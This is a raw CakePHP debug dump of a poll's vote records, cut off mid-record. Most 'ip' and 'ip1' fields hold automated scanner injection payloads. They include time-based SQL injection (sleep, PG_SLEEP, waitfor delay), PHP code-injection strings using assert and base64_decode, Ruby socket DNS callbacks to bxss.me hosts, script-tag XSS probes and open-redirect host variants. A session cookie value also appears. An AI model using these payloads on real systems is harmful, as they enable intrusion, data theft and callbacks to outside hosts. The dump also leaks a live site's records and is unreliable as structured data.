(int) 4187 => array(
'id' => '4730',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4188 => array(
'id' => '4731',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4189 => array(
'id' => '4732',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4190 => array(
'id' => '4733',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4191 => array(
'id' => '4734',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4192 => array(
'id' => '4735',
'ip' => '45.137.76.29',
'ip1' => '-1' OR 2+219-219-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 4193 => array(
'id' => '4736',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4194 => array(
'id' => '4737',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4195 => array(
'id' => '4738',
'ip' => '45.137.76.29',
'ip1' => '-1' OR 2+896-896-1=0+0+0+1 or 'b0LzIyhl'='',
'sondage_id' => '2'
),
(int) 4196 => array(
'id' => '4739',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4197 => array(
'id' => '4740',
'ip' => '45.137.76.29',
'ip1' => ';assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));',
'sondage_id' => '2'
),
(int) 4198 => array(
'id' => '4741',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4199 => array(
'id' => '4742',
'ip' => '45.137.76.29',
'ip1' => '-1" OR 2+539-539-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 4200 => array(
'id' => '4743',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4201 => array(
'id' => '4744',
'ip' => '45.137.76.29',
'ip1' => 'if(now()=sysdate(),sleep(15),0)',
'sondage_id' => '2'
),
(int) 4202 => array(
'id' => '4745',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4203 => array(
'id' => '4746',
'ip' => '45.137.76.29',
'ip1' => '';print(md5(31337));$a='',
'sondage_id' => '2'
),
(int) 4204 => array(
'id' => '4747',
'ip' => '45.137.76.29',
'ip1' => '<pre class=0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z',
'sondage_id' => '2'
),
(int) 4205 => array(
'id' => '4748',
'ip' => '45.137.76.29',
'ip1' => '";print(md5(31337));$a="',
'sondage_id' => '2'
),
(int) 4206 => array(
'id' => '4749',
'ip' => '45.137.76.29',
'ip1' => '<pre class=0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z',
'sondage_id' => '2'
),
(int) 4207 => array(
'id' => '4750',
'ip' => '45.137.76.29',
'ip1' => '(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/',
'sondage_id' => '2'
),
(int) 4208 => array(
'id' => '4751',
'ip' => '45.137.76.29',
'ip1' => ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',
'sondage_id' => '2'
),
(int) 4209 => array(
'id' => '4752',
'ip' => '45.137.76.29',
'ip1' => '<pre class=-1 waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 4210 => array(
'id' => '4753',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4211 => array(
'id' => '4754',
'ip' => '45.137.76.29',
'ip1' => '${@print(md5(31337))}',
'sondage_id' => '2'
),
(int) 4212 => array(
'id' => '4755',
'ip' => '45.137.76.29',
'ip1' => '<pre class=0yqLgWsQ'; waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 4213 => array(
'id' => '4756',
'ip' => 'xfs.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4214 => array(
'id' => '4757',
'ip' => '45.137.76.29',
'ip1' => '${@print(md5(31337))}\',
'sondage_id' => '2'
),
(int) 4215 => array(
'id' => '4758',
'ip' => '45.137.76.29',
'ip1' => '<pre class=zZGk4Sqq' OR 551=(SELECT 551 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 4216 => array(
'id' => '4759',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4217 => array(
'id' => '4760',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4218 => array(
'id' => '4761',
'ip' => '45.137.76.29',
'ip1' => ''.print(md5(31337)).'',
'sondage_id' => '2'
),
(int) 4219 => array(
'id' => '4762',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4220 => array(
'id' => '4763',
'ip' => '45.137.76.29',
'ip1' => '<pre class=BL7tzQ6K') OR 520=(SELECT 520 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 4221 => array(
'id' => '4764',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4222 => array(
'id' => '4765',
'ip' => '45.137.76.29',
'ip1' => 'xfs.bxss.me',
'sondage_id' => '2'
),
(int) 4223 => array(
'id' => '4766',
'ip' => '45.137.76.29',
'ip1' => '<pre class=w53jay7A')) OR 903=(SELECT 903 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 4224 => array(
'id' => '4767',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4225 => array(
'id' => '4768',
'ip' => '45.137.76.29',
'ip1' => '"+"A".concat(70-3).concat(22*4).concat(111).concat(86).concat(111).concat(84)+(require"socket"
Socket.gethostbyname("hitbr"+"occdukaccc1cd.bxss.me.")[3].to_s)+"',
'sondage_id' => '2'
),
(int) 4226 => array(
'id' => '4769',
'ip' => '45.137.76.29',
'ip1' => 'HttP://bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 4227 => array(
'id' => '4770',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4228 => array(
'id' => '4771',
'ip' => '45.137.76.29',
'ip1' => '<pre class='||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'',
'sondage_id' => '2'
),
(int) 4229 => array(
'id' => '4772',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4230 => array(
'id' => '4773',
'ip' => ''"',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4231 => array(
'id' => '4774',
'ip' => '45.137.76.29',
'ip1' => ''+'A'.concat(70-3).concat(22*4).concat(102).concat(74).concat(99).concat(77)+(require'socket'
Socket.gethostbyname('hitka'+'vmawvsfa96b0f.bxss.me.')[3].to_s)+'',
'sondage_id' => '2'
),
(int) 4232 => array(
'id' => '4775',
'ip' => '45.137.76.29',
'ip1' => 'bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 4233 => array(
'id' => '4776',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4234 => array(
'id' => '4777',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4235 => array(
'id' => '4778',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4236 => array(
'id' => '4779',
'ip' => '45.137.76.29',
'ip1' => ''A'.concat(70-3).concat(22*4).concat(111).concat(74).concat(121).concat(82)+(require'socket'
Socket.gethostbyname('hitur'+'phyvvgvm34486.bxss.me.')[3].to_s)',
'sondage_id' => '2'
),
(int) 4237 => array(
'id' => '4780',
'ip' => '<!--',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4238 => array(
'id' => '4781',
'ip' => '45.137.76.29',
'ip1' => '<pre class='"',
'sondage_id' => '2'
),
(int) 4239 => array(
'id' => '4782',
'ip' => '45.137.76.29',
'ip1' => ''"',
'sondage_id' => '2'
),
(int) 4240 => array(
'id' => '4783',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4241 => array(
'id' => '4784',
'ip' => '45.137.76.29',
'ip1' => '<!--',
'sondage_id' => '2'
),
(int) 4242 => array(
'id' => '4785',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4243 => array(
'id' => '4786',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4244 => array(
'id' => '4787',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4245 => array(
'id' => '4788',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4246 => array(
'id' => '4789',
'ip' => '45.137.76.29',
'ip1' => '@@WuBUA',
'sondage_id' => '2'
),
(int) 4247 => array(
'id' => '4790',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4248 => array(
'id' => '4791',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4249 => array(
'id' => '4792',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4250 => array(
'id' => '4793',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4251 => array(
'id' => '4794',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4252 => array(
'id' => '4795',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4253 => array(
'id' => '4796',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4254 => array(
'id' => '4797',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4255 => array(
'id' => '4798',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4256 => array(
'id' => '4799',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4257 => array(
'id' => '4800',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4258 => array(
'id' => '4801',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4259 => array(
'id' => '4802',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4260 => array(
'id' => '4803',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4261 => array(
'id' => '4804',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4262 => array(
'id' => '4805',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4263 => array(
'id' => '4806',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4264 => array(
'id' => '4807',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4265 => array(
'id' => '4808',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4266 => array(
'id' => '4809',
'ip' => 'bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4267 => array(
'id' => '4810',
'ip' => '45.137.76.299584261',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4268 => array(
'id' => '4811',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4269 => array(
'id' => '4812',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4270 => array(
'id' => '4813',
'ip' => 'scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4271 => array(
'id' => '4814',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4272 => array(
'id' => '4815',
'ip' => 'scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4273 => array(
'id' => '4816',
'ip' => 'scimat.dz:80@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4274 => array(
'id' => '4817',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4275 => array(
'id' => '4818',
'ip' => 'bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4276 => array(
'id' => '4819',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4277 => array(
'id' => '4820',
'ip' => '45.137.76.29',
'ip1' => '<pre class='"()&%<zzz><ScRiPt >fMNa(9790)</ScRiPt>',
'sondage_id' => '2'
),
(int) 4278 => array(
'id' => '4821',
'ip' => 'bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4279 => array(
'id' => '4822',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4280 => array(
'id' => '4823',
'ip' => '45.137.76.29',
'ip1' => ''"()&%<zzz><ScRiPt >fMNa(9702)</ScRiPt>',
'sondage_id' => '2'
),
(int) 4281 => array(
'id' => '4824',
'ip' => 'bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4282 => array(
'id' => '4825',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4283 => array(
'id' => '4826',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4284 => array(
'id' => '4827',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4285 => array(
'id' => '4828',
'ip' => '//bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4286 => array(
'id' => '4829',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4287 => array(
'id' => '4830',
'ip' => '//scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4288 => array(
'id' => '4831',
'ip' => '//scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4289 => array(
'id' => '4832',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4290 => array(
'id' => '4833',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4291 => array(
'id' => '4834',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4292 => array(
'id' => '4835',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4293 => array(
'id' => '4836',
'ip' => '//bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4294 => array(
'id' => '4837',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4295 => array(
'id' => '4838',
'ip' => '45.137.76.29',
'ip1' => '<pre class=9284924',
'sondage_id' => '2'
),
(int) 4296 => array(
'id' => '4839',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4297 => array(
'id' => '4840',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4298 => array(
'id' => '4841',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4299 => array(
'id' => '4842',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4300 => array(
'id' => '4843',
'ip' => '//bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4301 => array(
'id' => '4844',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4302 => array(
'id' => '4845',
'ip' => '//bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4303 => array(
'id' => '4846',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4304 => array(
'id' => '4847',
'ip' => 'http:bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4305 => array(
'id' => '4848',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4306 => array(
'id' => '4849',
'ip' => 'http:bxss.me/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4307 => array(
'id' => '4850',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4308 => array(
'id' => '4851',
'ip' => 'http:bxss.me/\',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4309 => array(
'id' => '4852',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4310 => array(
'id' => '4853',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4311 => array(
'id' => '4854',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4312 => array(
'id' => '4855',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4313 => array(
'id' => '4856',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4314 => array(
'id' => '4857',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4315 => array(
'id' => '4858',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4316 => array(
'id' => '4859',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4317 => array(
'id' => '4860',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4318 => array(
'id' => '4861',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4319 => array(
'id' => '4862',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4320 => array(
'id' => '4863',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4321 => array(
'id' => '4864',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4322 => array(
'id' => '4865',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4323 => array(
'id' => '4866',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4324 => array(
'id' => '4867',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4325 => array(
'id' => '4868',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4326 => array(
'id' => '4869',
'ip' => 'https:\\bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4327 => array(
'id' => '4870',
'ip' => 'https:\\bxss.me/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4328 => array(
'id' => '4871',
'ip' => 'https:\\bxss.me/\',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4329 => array(
'id' => '4872',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4330 => array(
'id' => '4873',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4331 => array(
'id' => '4874',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4332 => array(
'id' => '4875',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4333 => array(
'id' => '4876',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4334 => array(
'id' => '4877',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4335 => array(
'id' => '4878',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4336 => array(
'id' => '4879',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4337 => array(
'id' => '4880',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4338 => array(
'id' => '4881',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4339 => array(
'id' => '4882',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4340 => array(
'id' => '4883',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4341 => array(
'id' => '4884',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4342 => array(
'id' => '4885',
'ip' => '/\bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4343 => array(
'id' => '4886',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4344 => array(
'id' => '4887',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4345 => array(
'id' => '4888',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4346 => array(
'id' => '4889',
'ip' => '/\scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4347 => array(
'id' => '4890',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4348 => array(
'id' => '4891',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4349 => array(
'id' => '4892',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4350 => array(
'id' => '4893',
'ip' => '/\scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4351 => array(
'id' => '4894',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4352 => array(
'id' => '4895',
'ip' => '/\bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4353 => array(
'id' => '4896',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4354 => array(
'id' => '4897',
'ip' => '/\bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4355 => array(
'id' => '4898',
'ip' => '/\bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4356 => array(
'id' => '4899',
'ip' => '/\/bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4357 => array(
'id' => '4900',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4358 => array(
'id' => '4901',
'ip' => '/\/scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4359 => array(
'id' => '4902',
'ip' => '/\/scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4360 => array(
'id' => '4903',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4361 => array(
'id' => '4904',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4362 => array(
'id' => '4905',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4363 => array(
'id' => '4906',
'ip' => '/\/bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4364 => array(
'id' => '4907',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4365 => array(
'id' => '4908',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4366 => array(
'id' => '4909',
'ip' => '/\/bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4367 => array(
'id' => '4910',
'ip' => '\\bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4368 => array(
'id' => '4911',
'ip' => '\\scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4369 => array(
'id' => '4912',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4370 => array(
'id' => '4913',
'ip' => '\\scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4371 => array(
'id' => '4914',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4372 => array(
'id' => '4915',
'ip' => '\\bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4373 => array(
'id' => '4916',
'ip' => '\\bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4374 => array(
'id' => '4917',
'ip' => '\\bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4375 => array(
'id' => '4918',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4376 => array(
'id' => '4919',
'ip' => '45.137.76.29',
'ip1' => 'https://scimat.dz/',
'sondage_id' => '2'
),
(int) 4377 => array(
'id' => '4920',
'ip' => '45.137.76.29',
'ip1' => 'https://redirtest.acx/',
'sondage_id' => '2'
),
(int) 4378 => array(
'id' => '4921',
'ip' => '45.137.76.29',
'ip1' => 'scimat.dz',
'sondage_id' => '2'
),
(int) 4379 => array(
'id' => '4922',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4380 => array(
'id' => '4923',
'ip' => '45.137.76.29',
'ip1' => 'redirtest.acx',
'sondage_id' => '2'
),
(int) 4381 => array(
'id' => '4924',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4382 => array(
'id' => '4925',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4383 => array(
'id' => '4926',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4384 => array(
'id' => '4927',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4385 => array(
'id' => '4928',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4386 => array(
'id' => '4929',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4387 => array(
'id' => '4930',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4388 => array(
'id' => '4931',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4389 => array(
'id' => '4932',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4390 => array(
'id' => '4933',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4391 => array(
'id' => '4934',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4392 => array(
'id' => '4935',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4393 => array(
'id' => '4936',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4394 => array(
'id' => '4937',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4395 => array(
'id' => '4938',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4396 => array(
'id' => '4939',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4397 => array(
'id' => '4940',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4398 => array(
'id' => '4941',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4399 => array(
'id' => '4942',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4400 => array(
'id' => '4943',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4401 => array(
'id' => '4944',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4402 => array(
'id' => '4945',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4403 => array(
'id' => '4946',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4404 => array(
'id' => '4947',
'ip' => '194.34.233.72',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 4405 => array(
'id' => '4948',
'ip' => '194.34.233.72',
